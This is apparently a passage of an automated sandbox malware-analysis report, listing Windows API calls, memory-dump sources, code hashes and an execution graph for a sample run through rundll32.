                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: Show$OwnedPopupsWindow$EnumWindows
                              • String ID:
                              • API String ID: 315437064-0
                              • Opcode ID: edfed6f5f15fcdc2b1723cb1dc211990ab492ae73b83ea4d7d1dfbe253dbe0dd
                              • Instruction ID: 895c19d8fa7d7a89bf8008234c4737b7b7706d7b81578e6d63120f936ed3d18b
                              • Opcode Fuzzy Hash: edfed6f5f15fcdc2b1723cb1dc211990ab492ae73b83ea4d7d1dfbe253dbe0dd
                              • Instruction Fuzzy Hash: 66415130600B41AFE730DF39C488BAA73E1FB84359F5509B9D869872A1C774BC81DB11
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • UnhookWindowsHookEx.USER32(00000000), ref: 04B356E6
                              • SetEvent.KERNEL32(00000000), ref: 04B35712
                              • GetCurrentThreadId.KERNEL32 ref: 04B35717
                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 04B35740
                              • CloseHandle.KERNEL32(00000000,00000000), ref: 04B3574D
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                              • String ID:
                              • API String ID: 2132507429-0
                              • Opcode ID: 06acf9256f85a625df9f0ce8ef9aae0d3e29f85b4f1cc4b2c16824b76678b57f
                              • Instruction ID: c8a8c4172ef4c0eff3c431afa619d532afc2626a175fe13674d2921ca5e66f5e
                              • Opcode Fuzzy Hash: 06acf9256f85a625df9f0ce8ef9aae0d3e29f85b4f1cc4b2c16824b76678b57f
                              • Instruction Fuzzy Hash: F301D670A44301EFE710FF65C945B5A33E4EB80319F508566B8A8C71E0DA34BC54CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0494DD89
                              • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0494DDE7
                              • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0494DE44
                              • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0494DE77
                                • Part of subcall function 0494DD34: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0494DDF5), ref: 0494DD4B
                                • Part of subcall function 0494DD34: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0494DDF5), ref: 0494DD68
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: Thread$LanguagesPreferred$Language
                              • String ID:
                              • API String ID: 2255706666-0
                              • Opcode ID: 574a56cc8664486beea7d70dee89c0cb8ff60f4c38c687d4400ce465520d5f71
                              • Instruction ID: fbd713cf780a0ea81716992954ccaa7542de12b884be908862644fcb6c58671e
                              • Opcode Fuzzy Hash: 574a56cc8664486beea7d70dee89c0cb8ff60f4c38c687d4400ce465520d5f71
                              • Instruction Fuzzy Hash: CE313E74A0021A9BDF10DFE8C884AEFB7B8EF95304F504676D515E7290DB74AE05CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetWindow.USER32(?,00000004), ref: 04B364E6
                              • GetWindowThreadProcessId.USER32(?,?), ref: 04B36503
                              • GetCurrentProcessId.KERNEL32(?,00000004), ref: 04B3650F
                              • IsWindowVisible.USER32(?), ref: 04B36569
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: Window$Process$CurrentThreadVisible
                              • String ID:
                              • API String ID: 3926708836-0
                              • Opcode ID: 42757a48adf62f74c8eb7625b754569f157a4ff60b9f756538ec2d8e1239a163
                              • Instruction ID: 5703b4cbc4bcd830dd33a38825902c194db3486ede9a35ad40930e889e11ec39
                              • Opcode Fuzzy Hash: 42757a48adf62f74c8eb7625b754569f157a4ff60b9f756538ec2d8e1239a163
                              • Instruction Fuzzy Hash: 14314C31A00209ABDB60EF5AD8C5AAA73A4EB54314F1541B2ED04E734ADB34FE548B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetActiveWindow.USER32(?,?,04BA01D8,04B37DC8), ref: 04B3714E
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: ActiveWindow
                              • String ID:
                              • API String ID: 2558294473-0
                              • Opcode ID: 3a3482db3d3017f85c8397938c9e80ebde1f586c6287a5805f17761587ae5c45
                              • Instruction ID: bb4e149ce164c3ef356381245af7523f27597b18773a5dfbe1af2b145ee64584
                              • Opcode Fuzzy Hash: 3a3482db3d3017f85c8397938c9e80ebde1f586c6287a5805f17761587ae5c45
                              • Instruction Fuzzy Hash: 903108B0604240ABEF54EE69CCC4B9A3396AF09309F4884F5BD09DF25ADA64FC858761
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • EnumWindows.USER32(04B361C0), ref: 04B362B1
                              • GetWindow.USER32(00000003,00000003), ref: 04B362C9
                              • GetWindowLongW.USER32(00000000,000000EC), ref: 04B362D6
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 04B36315
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: Window$EnumLongWindows
                              • String ID:
                              • API String ID: 4191631535-0
                              • Opcode ID: f952e3bd2f1d56ac5fe753767d563e8f7822f3651daa97ff1cbb78a9a63348b1
                              • Instruction ID: dc5c6f6abf453ef5dd99286212505f2b2d4ed75d5e4f2797f6283b52bdafd53d
                              • Opcode Fuzzy Hash: f952e3bd2f1d56ac5fe753767d563e8f7822f3651daa97ff1cbb78a9a63348b1
                              • Instruction Fuzzy Hash: 0B115A31604710BFEB20EA2DCC84F9A7794DB85725F2542B4FD98AF2D1C760A845CB66
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetWindowThreadProcessId.USER32(00000000), ref: 04A73E7D
                              • GetCurrentProcessId.KERNEL32(?,?,00000000,04B3985D,?,?,?,00000001,04B37A37), ref: 04A73E86
                              • GlobalFindAtomW.KERNEL32(00000000), ref: 04A73E9B
                              • GetPropW.USER32(00000000,00000000), ref: 04A73EB2
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                              • String ID:
                              • API String ID: 2582817389-0
                              • Opcode ID: 0e776a8b2cca092576ae838f7866e3ba4a91b7857c295ee72f47b630bd7ed2a8
                              • Instruction ID: 5c734e7259f33f6f8213bc747c9e446fac6252ca545478aa50831d92131817a0
                              • Opcode Fuzzy Hash: 0e776a8b2cca092576ae838f7866e3ba4a91b7857c295ee72f47b630bd7ed2a8
                              • Instruction Fuzzy Hash: A9F039727002216AAE31FBB59C8182F62DCCB842A97960832FD49C7251D62AFC45E7B4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:2.8%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:177
                              Total number of Limit Nodes:10
                              execution_graph 9193 4f90898 9196 4d519b8 9193->9196 9195 4f908a8 9197 4d519c3 9196->9197 9200 4d4a6f8 9197->9200 9201 4d4a707 9200->9201 9202 4d4a70c GetCurrentThreadId 9200->9202 9201->9202 9203 4d4a742 9202->9203 9204 4d4aa44 9203->9204 9205 4d4a7b5 9203->9205 9207 4d4aa60 9204->9207 9208 4d4aa71 9204->9208 9219 4d4a68c 9205->9219 9223 4d4a9ac 9207->9223 9210 4d4aa7a GetCurrentThreadId 9208->9210 9213 4d4aa87 9208->9213 9210->9213 9212 4d4aa6a 9212->9208 9214 4d46f7c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 9213->9214 9215 4d4ab17 FreeLibrary 9213->9215 9216 4d4ab3f 9213->9216 9214->9213 9215->9213 9217 4d4ab4e ExitProcess 9216->9217 9218 4d4ab48 9216->9218 9218->9217 9220 4d4a6d4 9219->9220 9221 4d4a69c 9219->9221 9220->9195 9221->9220 9229 4d502f4 GetSystemInfo 9221->9229 9224 4d4a9b6 GetStdHandle WriteFile 9223->9224 9225 4d4aa13 9223->9225 9230 4d4b5b8 9224->9230 9225->9212 9228 4d4aa03 GetStdHandle WriteFile 9228->9212 9229->9221 9231 4d4b5be 9230->9231 9231->9228 9232 4d459b0 9233 4d45c10 9232->9233 9234 4d459c8 9232->9234 9235 4d45d28 9233->9235 9236 4d45bd4 9233->9236 9243 4d459da 9234->9243 9246 4d45a65 Sleep 9234->9246 9237 4d45d31 9235->9237 9238 4d4575c VirtualAlloc 9235->9238 9245 4d45bee Sleep 9236->9245 9247 4d45c2e 9236->9247 9240 4d45797 9238->9240 9241 4d45787 9238->9241 9239 4d459e9 9256 4d45710 9241->9256 9243->9239 9244 4d45ac8 9243->9244 9250 4d45aa9 Sleep 9243->9250 9255 4d45ad4 9244->9255 9261 4d45694 9244->9261 9245->9247 9248 4d45c04 Sleep 9245->9248 9246->9243 9249 4d45a7b Sleep 9246->9249 9251 4d45694 VirtualAlloc 9247->9251 9252 4d45c4c 9247->9252 9248->9236 9249->9234 9250->9244 9254 4d45abf Sleep 9250->9254 9251->9252 9254->9243 9257 4d45758 9256->9257 9258 4d45719 9256->9258 9257->9240 9258->9257 9259 4d45724 Sleep 9258->9259 9259->9257 9260 4d4573e Sleep 9259->9260 9260->9258 9265 4d45628 9261->9265 9263 4d4569d VirtualAlloc 9264 4d456b4 9263->9264 9264->9255 9266 4d455c8 9265->9266 9266->9263 9267 4d4d658 9268 4d4d684 9267->9268 9269 4d4d668 GetModuleFileNameW 9267->9269 9271 4d4e8cc GetModuleFileNameW 9269->9271 9272 4d4e91a 9271->9272 9277 4d4e7a8 9272->9277 9274 4d4e946 9275 4d4e958 LoadLibraryExW 9274->9275 9276 4d4e960 9274->9276 9275->9276 9276->9268 9280 4d4e7c9 9277->9280 9278 4d4e851 9278->9274 9280->9278 9295 4d4e4e4 9280->9295 9281 4d4e83e 9282 4d4e844 9281->9282 9283 4d4e853 GetUserDefaultUILanguage 9281->9283 9284 4d4e610 2 API calls 9282->9284 9299 4d4de94 EnterCriticalSection 9283->9299 9284->9278 9286 4d4e860 9319 4d4e610 9286->9319 9288 4d4e86d 9289 4d4e87b GetSystemDefaultUILanguage 9288->9289 9290 4d4e895 9288->9290 9291 4d4de94 17 API calls 9289->9291 9290->9278 9323 4d4e6dc 9290->9323 9293 4d4e888 9291->9293 9294 4d4e610 2 API calls 9293->9294 9294->9290 9296 4d4e506 9295->9296 9298 4d4e510 9295->9298 9331 4d4e1c8 9296->9331 9298->9281 9300 4d4dee0 LeaveCriticalSection 9299->9300 9301 4d4dec0 9299->9301 9368 4d4ad14 9300->9368 9303 4d4ded1 LeaveCriticalSection 9301->9303 9313 4d4df82 9303->9313 9304 4d4def1 IsValidLocale 9305 4d4df00 9304->9305 9306 4d4df4f EnterCriticalSection 9304->9306 9308 4d4df14 9305->9308 9309 4d4df09 9305->9309 9307 4d4df67 9306->9307 9314 4d4df78 LeaveCriticalSection 9307->9314 9383 4d4db7c 9308->9383 9370 4d4dd78 GetThreadUILanguage 9309->9370 9312 4d4df1d GetSystemDefaultUILanguage 9312->9306 9315 4d4df27 9312->9315 9313->9286 9314->9313 9316 4d4df38 GetSystemDefaultUILanguage 9315->9316 9317 4d4db7c 3 API calls 9316->9317 9318 4d4df12 9317->9318 9318->9306 9320 4d4e62e 9319->9320 9321 4d4e6a9 9320->9321 9392 4d4e5a4 9320->9392 9321->9288 9397 4d4adf8 9323->9397 9326 4d4e72c 9327 4d4e5a4 2 API calls 9326->9327 9328 4d4e740 9327->9328 9329 4d4e76e 9328->9329 9330 4d4e5a4 2 API calls 9328->9330 9329->9278 9330->9329 9332 4d4e1df 9331->9332 9333 4d4e1f3 GetModuleFileNameW 9332->9333 9334 4d4e208 9332->9334 9333->9334 9335 4d4e3d7 9334->9335 9336 4d4e230 RegOpenKeyExW 9334->9336 9335->9298 9337 4d4e257 RegOpenKeyExW 9336->9337 9338 4d4e2f1 9336->9338 9337->9338 9339 4d4e275 RegOpenKeyExW 9337->9339 9352 4d4dfd8 GetModuleHandleW 9338->9352 9339->9338 9341 4d4e293 RegOpenKeyExW 9339->9341 9341->9338 9343 4d4e2b1 RegOpenKeyExW 9341->9343 9342 4d4e30f RegQueryValueExW 9344 4d4e360 RegQueryValueExW 9342->9344 9345 4d4e32d 9342->9345 9343->9338 9346 4d4e2cf RegOpenKeyExW 9343->9346 9347 4d4e37c 9344->9347 9351 4d4e35e 9344->9351 9348 4d4e335 RegQueryValueExW 9345->9348 9346->9335 9346->9338 9349 4d4e384 RegQueryValueExW 9347->9349 9348->9351 9349->9351 9350 4d4e3c6 RegCloseKey 9350->9298 9351->9350 9353 4d4e000 GetProcAddress 9352->9353 9354 4d4e011 9352->9354 9353->9354 9358 4d4e027 9354->9358 9360 4d4e073 9354->9360 9364 4d4dfb4 9354->9364 9357 4d4dfb4 CharNextW 9357->9360 9358->9342 9359 4d4dfb4 CharNextW 9359->9360 9360->9358 9360->9359 9361 4d4e0f8 FindFirstFileW 9360->9361 9363 4d4e162 lstrlenW 9360->9363 9361->9358 9362 4d4e114 FindClose lstrlenW 9361->9362 9362->9358 9362->9360 9363->9360 9365 4d4dfc2 9364->9365 9366 4d4dfd0 9365->9366 9367 4d4dfba CharNextW 9365->9367 9366->9357 9366->9358 9367->9365 9369 4d4ad1a 9368->9369 9369->9304 9371 4d4dd94 9370->9371 9372 4d4dded 9370->9372 9388 4d4dd34 GetThreadPreferredUILanguages 9371->9388 9374 4d4dd34 2 API calls 9372->9374 9378 4d4ddf5 9374->9378 9375 4d4dd9c 9375->9375 9377 4d4ddd1 SetThreadPreferredUILanguages 9375->9377 9376 4d4de3c SetThreadPreferredUILanguages 9379 4d4dd34 2 API calls 9376->9379 9377->9372 9378->9376 9382 4d4de7d 9378->9382 9380 4d4de52 9379->9380 9381 4d4de6d SetThreadPreferredUILanguages 9380->9381 9380->9382 9381->9382 9382->9318 9387 4d4dbb7 9383->9387 9384 4d4dc20 IsValidLocale 9385 4d4dc33 GetLocaleInfoW GetLocaleInfoW 9384->9385 9386 4d4dc6e 9384->9386 9385->9386 9386->9312 9387->9384 9387->9386 9389 4d4dd55 9388->9389 9390 4d4dd6e 9388->9390 9391 4d4dd5e GetThreadPreferredUILanguages 9389->9391 9390->9375 9391->9390 9393 4d4e5b9 9392->9393 9394 4d4e5d6 FindFirstFileW 9393->9394 9395 4d4e5e6 FindClose 9394->9395 9396 4d4e5ec 9394->9396 9395->9396 9396->9320 9398 4d4adfc GetUserDefaultUILanguage GetLocaleInfoW 9397->9398 9398->9326

                              Control-flow Graph

                              APIs
                              • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,04D4E79C,?,?), ref: 04D4E70E
                              • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,04D4E79C,?,?), ref: 04D4E717
                                • Part of subcall function 04D4E5A4: FindFirstFileW.KERNEL32(00000000,?,00000000,04D4E602,?,00000001), ref: 04D4E5D7
                                • Part of subcall function 04D4E5A4: FindClose.KERNEL32(00000000,00000000,?,00000000,04D4E602,?,00000001), ref: 04D4E5E7
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                              • String ID:
                              • API String ID: 3216391948-0
                              • Opcode ID: 91fb882cf5c609b258c06be900262b6994af97a6d299a02b94dda68032de2d37
                              • Instruction ID: 35286537c126f7ba521db157e7b675574a08a270b609eec12586d6eda3452abc
                              • Opcode Fuzzy Hash: 91fb882cf5c609b258c06be900262b6994af97a6d299a02b94dda68032de2d37
                              • Instruction Fuzzy Hash: 6C114F74B00209ABEF04EFA9D891AAEB7B8FF84304F504476A514A7351EB74BE058A71
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,00000000,04D4E602,?,00000001), ref: 04D4E5D7
                              • FindClose.KERNEL32(00000000,00000000,?,00000000,04D4E602,?,00000001), ref: 04D4E5E7
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2473864925.0000000004D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04D40000, based on PE: true
                              • Associated: 0000000F.00000002.2473839537.0000000004D40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2473864925.0000000004D5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474122051.0000000004F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474145070.0000000004F92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474170382.0000000004F93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474189551.0000000004F97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474214353.0000000004F98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474241876.0000000004F9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474268841.0000000004FA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474295293.0000000004FA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000F.00000002.2474324726.0000000004FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_4d40000_rundll32.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID:
                              • API String ID: 2295610775-0
                              • Opcode ID: 8b0dc5451a40ac37fdd51c0cbfa5a5da1f03016048df7f8fbb244962e8791ed9
                              • Instruction ID: 58c8012e153a8f7a2faf4217c3f98853d787db46489dbe1a0a6d41cddc560842
                              • Opcode Fuzzy Hash: 8b0dc5451a40ac37fdd51c0cbfa5a5da1f03016048df7f8fbb244962e8791ed9
                              • Instruction Fuzzy Hash: 11F0BE70614614BFE750EB78DC1684EB7ECEB89614BA009B1E800D2250F734BF049924
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
